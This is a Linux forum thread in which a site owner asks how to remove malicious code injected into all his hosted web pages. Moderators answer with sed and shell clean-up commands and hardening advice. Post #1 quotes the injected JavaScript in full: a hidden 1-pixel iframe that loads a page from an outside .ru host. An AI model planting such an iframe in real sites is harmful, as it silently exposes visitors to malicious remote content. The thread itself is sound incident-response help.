LinuxQuestions.org
Old 11-16-2012, 03:59 AM   #1
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Rep: Reputation: 16
Malware affected


Hi friends,

I have a lot of websites hosted on my Linux box. In my websites' content, the following code was injected into all my PHP and HTM pages.

<!--744345--><script type="text/javascript" language="javascript" > (function () { var denr = document.createElement('iframe'); denr.src = 'http://ivkikcop.ru/count9.php'; denr.style.position = 'absolute'; denr.style.border = '0'; denr.style.height = '1px'; denr.style.width = '1px'; denr.style.left = '1px'; denr.style.top = '1px'; if (!document.getElementById('denr')) { document.write('<div id=\'denr\'></div>'); document.getElementById('denr').appendChild(denr); }})();</script><!--/744345-->

Can anyone tell me how to remove the above injected code from all my HTM and PHP pages,
or any other scripts? Please help on this.
I am using CentOS 5.

Thanks
 
Old 11-16-2012, 05:08 AM   #2
eyanu
Member
 
Registered: Jul 2012
Location: kampala,Uganda
Distribution: backtrack
Posts: 87

Rep: Reputation: Disabled
Hey, I've been reading a lot. What you're facing looks like a lot of work if it's the whole server; however, it's possible, and I landed on this. Hope it helps you.
http://stackoverflow.com/questions/1...th-same-prefix
 
Old 11-16-2012, 05:45 AM   #3
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Original Poster
Rep: Reputation: 16
Quote:
Originally Posted by eyanu View Post
Hey, I've been reading a lot. What you're facing looks like a lot of work if it's the whole server; however, it's possible, and I landed on this. Hope it helps you.
http://stackoverflow.com/questions/1...th-same-prefix
Hi,

Thanks for the reply.
I am sorry, I can't understand the script. Please give any other solution.
Thanks
 
Old 11-16-2012, 06:02 AM   #4
eyanu
Member
 
Registered: Jul 2012
Location: kampala,Uganda
Distribution: backtrack
Posts: 87

Rep: Reputation: Disabled
That's bash scripting; I would advise you to read about it so that you don't screw up everything. If you don't know any scripting/programming, then I am sorry, you might have to do everything manually.
 
Old 11-16-2012, 06:38 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,279
Blog Entries: 54

Rep: Reputation: 2852
Quote:
Originally Posted by saran_redhat View Post
Can anyone tell me how to remove the above injected code from all my HTM and PHP pages?
This should do:
Code:
find /path/to/docroot /home/user/docroot -type f -print0 | xargs -0 -I X sed -i_infected "s|<\!--744345.*/744345-->||g" 'X'

Quote:
Originally Posted by saran_redhat View Post
I have lot of websites hosted in my linux box.
Be aware injecting I-frames is just a symptom.
The cause is the hosting company or you running outdated software, 3rd party plugins or not running things like they should. Fix that.


Does the fact that you seem to be located in Chennai signify anything wrt server ownership and responsibility? Are these servers you manage for a company or your own private servers? I'm asking because you seem to have structural problems going back to when you registered:
http://www.linuxquestions.org/questi...4/#post4761768 (2012)
http://www.linuxquestions.org/questi...2/#post4211065 (2011)
http://www.linuxquestions.org/questi...6/#post4135627 (2010)

Last edited by unSpawn; 11-16-2012 at 06:52 AM. Reason: //More *is* more
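A defender-side clean-up helper for the marker-delimited block shown in post #1, added here as an example rather than taken from the thread: unlike the sed one-liner above it only rewrites files that actually contain the marker, keeps a pristine `.infected` copy of each for later analysis, and handles several injections on the same line without greedy `.*` swallowing the legitimate content between them. It assumes POSIX sh with ordinary grep/sed/find, that each injected block sits on one line as in the pasted sample, and that the pages of interest end in .php/.htm/.html; the MARKER value and the function names are the example's own.

```shell
#!/bin/sh
# Added example (not the moderator's command): find and strip the
# <!--744345--> ... <!--/744345--> block, keeping a copy of every touched file.
# Assumes POSIX sh, grep, sed and find, and one injected block per line.

MARKER="${MARKER:-744345}"          # id taken from the injected comment markers
SEP=$(printf '\001')                # a byte that never occurs in page source

# clean_file FILE: returns 0 and rewrites FILE if it carried the marker, 1 if
# it was clean. The original is preserved as FILE.infected for forensics.
clean_file() {
    grep -q -- "<!--${MARKER}-->" "$1" || return 1
    cp -p "$1" "$1.infected" || return 2
    # 1. turn every closing marker into the SEP byte
    # 2. delete each opening marker up to the *nearest* SEP ([^SEP]* is the
    #    non-greedy match that basic sed regexps otherwise lack)
    # 3. put back any SEP left over from an unbalanced closing marker
    sed -e "s|<!--/${MARKER}-->|${SEP}|g" \
        -e "s|<!--${MARKER}-->[^${SEP}]*${SEP}||g" \
        -e "s|${SEP}|<!--/${MARKER}-->|g" "$1.infected" > "$1"
}

# clean_tree DIR: clean every .php/.htm/.html file under DIR that contains the
# marker, print each cleaned path and leave the count in CLEANED.
clean_tree() {
    CLEANED=0
    list=$(mktemp) || return 2
    # grep -l only names infected files; clean files are never rewritten
    find "$1" -type f \( -name '*.php' -o -name '*.htm' -o -name '*.html' \) \
        -exec grep -l -- "<!--${MARKER}-->" {} + > "$list" || true
    while IFS= read -r f; do
        clean_file "$f" && { echo "cleaned: $f"; CLEANED=$((CLEANED + 1)); }
    done < "$list"
    rm -f "$list"
}
```

Run it as `clean_tree /path/to/docroot` once per document root; the printed list of cleaned paths doubles as the inventory of which sites were hit.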
 
Old 11-20-2012, 06:56 AM   #6
saran_redhat
Member
 
Registered: May 2009
Location: chennai
Posts: 247

Original Poster
Rep: Reputation: 16
malware

Hi,

Thanks for the reply.

Is there any other way to find out how the malware attack happened on all my websites? Please give some ideas.

Thanks.


Quote:
Originally Posted by unSpawn View Post
This should do:
Code:
find /path/to/docroot /home/user/docroot -type f -print0 | xargs -0 -I X sed -i_infected "s|<\!--744345.*/744345-->||g" 'X'


Be aware injecting I-frames is just a symptom.
The cause is the hosting company or you running outdated software, 3rd party plugins or not running things like they should. Fix that.


Does the fact that you seem to be located in Chennai signify anything wrt server ownership and responsibility? Are these servers you manage for a company or your own private servers? I'm asking because you seem to have structural problems going back to when you registered:
http://www.linuxquestions.org/questi...4/#post4761768 (2012)
http://www.linuxquestions.org/questi...2/#post4211065 (2011)
http://www.linuxquestions.org/questi...6/#post4135627 (2010)
 
Old 11-20-2012, 07:32 AM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,279
Blog Entries: 54

Rep: Reputation: 2852
Quote:
Originally Posted by saran_redhat View Post
Is there any other way to find out how the malware attack happened on all my websites?
Like I said before, the main reason is running outdated versions of software, third party plugins or not running software like it should be. The latter includes issues like running all web sites in the same shared hosting environment, web servers running default configurations, PHP configuration allowing dangerous HTTP methods, lax file access permissions, installers that aren't cleaned up, unrestricted access to management interfaces, leeched FTP credentials, compromised SSH accounts, no hardened PHP, no web application firewall, no testing whatsoever, etc, etc.

There is no single configuration setting, not a single task to perform and not a single process to run to "fix things": the base has to be sound to have any effect and continuous auditing and maintenance are required. Start by assessing if the OS is properly configured, hardened and maintained, then assess if everything in your web stack is hardened and always up to date, then audit and test your setup.
 